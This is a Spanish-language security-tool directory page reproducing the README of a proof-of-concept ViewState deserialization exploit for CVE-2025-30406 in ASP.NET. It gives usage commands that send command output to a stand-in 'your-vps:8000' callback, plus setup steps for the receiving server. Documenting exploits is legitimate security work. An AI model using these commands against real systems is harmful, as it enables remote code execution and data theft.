Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mchklt/cve-2025-30406
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 PoC de exploit de ViewState

Ver Repositorio
90184hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-30406 PoC de Exploit de ViewState

Resumen

Este es un script de Prueba de Concepto (PoC) que demuestra una explotación de deserialización de ViewState para CVE-2025-30406 en aplicaciones ASP.NET. Utiliza ysoserial para generar un payload malicioso de ViewState y lo envía a una URL especificada por el usuario para ejecutar un comando proporcionado. Para obtener los mejores resultados, la salida del comando puede exfiltrarse a un servidor HTTP personalizado (server.py) que se ejecuta en un VPS, el cual muestra los resultados en un formato estilizado con marcas de tiempo, prompts verdes y texto de salida en blanco. Este script está destinado únicamente a fines educativos y solo debe utilizarse en sistemas donde tenga permiso explícito para realizar pruebas de seguridad. El uso no autorizado es ilegal y poco ético.

Detalles del CVE

  • ID del CVE: CVE-2025-30406
  • Descripción: Una vulnerabilidad de deserialización en el manejo de ViewState de ASP.NET que permite la ejecución remota de código cuando se conocen una clave de validación y un generador válidos.
  • Sistemas afectados: Aplicaciones ASP.NET con configuraciones de ViewState vulnerables.
  • Requisitos previos para la explotación:
    • Acceso a una clave de validación y un generador de ViewState válidos.
    • Un endpoint vulnerable que acepte parámetros de ViewState.

Contenido del Repositorio

  • exploit.py: El script PoC principal para generar y enviar el payload de ViewState.
Descargar herramienta
  • server.py: Un servidor HTTP para recibir y mostrar la salida de comandos exfiltrada en un formato estilizado.
  • README.md: Este archivo, con instrucciones de configuración y uso.
  • Requisitos previos

    • Python 3.x
    • Biblioteca requests (pip install requests)
    • Ejecutable de ysoserial (Windows o equivalente para su plataforma)
    • Un endpoint de aplicación ASP.NET vulnerable
    • Un VPS o servidor para ejecutar server.py (recomendado para la exfiltración)
    • Permiso para probar el sistema objetivo

    Instalación

    1. Clone este repositorio:
      root@kitploit:~
      git clone https://github.com/yourusername/cve-2025-30406-poc.git
      cd cve-2025-30406-poc
      
    2. Instale el paquete de Python requerido:
      root@kitploit:~
      pip install requests
      
    3. Descargue ysoserial y colóquelo en el mismo directorio que exploit.py o especifique su ruta:
      • ysoserial GitHub

    Configuración en un VPS (Recomendado)

    Para recibir la salida de comandos exfiltrada en un formato estilizado, ejecute server.py en un VPS:

    1. Copie server.py a su VPS (por ejemplo, mediante scp):
      root@kitploit:~
      scp server.py user@your-vps-ip:/home/user/
      
    2. Asegúrese de que Python 3 esté instalado:
      root@kitploit:~
      sudo apt update && sudo apt install python3 python3-pip
      
    3. Ejecute el servidor (puerto predeterminado 8000):
      root@kitploit:~
      python3 server.py
      
    4. Asegúrese de que el firewall del VPS permita el tráfico entrante en el puerto 8000:
      root@kitploit:~
      sudo ufw allow 8000
      
    5. Anote la IP pública o el dominio del VPS (por ejemplo, http://your-vps-ip:8000) para usarlo con el indicador -e en exploit.py.

    Uso

    Ejecución del Exploit

    Ejecute exploit.py con los argumentos requeridos. El indicador -e es opcional, pero altamente recomendado para exfiltrar la salida de comandos a server.py para su visualización estilizada.

    root@kitploit:~
    python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
    

    Argumentos

    • -u, --url: URL objetivo (p. ej., http://target.com/page.aspx) [Requerido]
    • -c, --command: Comando a ejecutar (p. ej., whoami) [Requerido]
    • -y, --ysoserial: Ruta al ejecutable de ysoserial (predeterminado: ./ysoserial.exe) [Opcional]
    • -e, --exfil: URL de callback para exfiltrar la salida de comandos (p. ej., http://your-vps:8000) [Opcional]

    Ejemplos

    1. Ejecutar sin exfiltración (ejecución a ciegas):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
      
    2. Ejecutar con exfiltración a un VPS que ejecute server.py (recomendado):
      root@kitploit:~
      python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
      

    Ejecución del Servidor

    En su VPS o máquina local, inicie el servidor HTTP para recibir la salida exfiltrada:

    root@kitploit:~
    python3 server.py
    

    El servidor mostrará la salida de los comandos con marcas de tiempo, un prompt $ verde y texto en blanco para facilitar la lectura.

    Cómo Funciona

    1. Script de Exploit (exploit.py):
      • Utiliza ysoserial con una clave de validación y un generador codificados para crear un payload de ViewState.
      • Si se proporciona -e, el comando se envuelve para capturar la salida y enviarla a la URL de callback mediante Invoke-WebRequest.
      • Envía el payload a la URL objetivo en una solicitud POST, incrustado en el parámetro __VIEWSTATE.
      • Imprime el estado de la respuesta del servidor y una parte del cuerpo de la respuesta.
    2. Servidor HTTP (server.py):
      • Escucha solicitudes GET que contienen la salida de comandos.
      • Decodifica la ruta de la URL y la divide en líneas.
      • Imprime cada línea con una marca de tiempo, un prompt $ verde y texto de salida en blanco.
      • Responde con HTTP 200 y "OK".

    Advertencia de Uso Ético

    • Este script es una prueba de concepto para CVE-2025-30406 con fines educativos y de pruebas de seguridad autorizadas.
    • No utilice este script en sistemas sin el permiso explícito del propietario del sistema.
    • El mal uso puede violar leyes, incluida la Computer Fraud and Abuse Act (CFAA) en los Estados Unidos o leyes similares en otros países.
    • Obtenga siempre el consentimiento por escrito antes de probar cualquier sistema.
    • Reporte las vulnerabilidades de manera responsable mediante divulgación coordinada o programas de bug bounty.

    Limitaciones

    • La clave de validación y el generador codificados pueden funcionar solo para aplicaciones vulnerables específicas. Los usuarios pueden necesitar valores específicos de la aplicación.
    • El exploit se dirige a aplicaciones ASP.NET vulnerables a la deserialización de ViewState.
    • El script asume que el servidor objetivo procesa el payload de ViewState correctamente.
    • La compatibilidad multiplataforma depende de la disponibilidad de ysoserial (principalmente basado en Windows).
    • La exfiltración requiere un servidor de acceso público para la URL de callback -e.

    Licencia

    Este proyecto está licenciado bajo la Licencia MIT. Consulte el archivo LICENSE para obtener más detalles.

    Contacto

    Para preguntas o comentarios, abra un issue en este repositorio.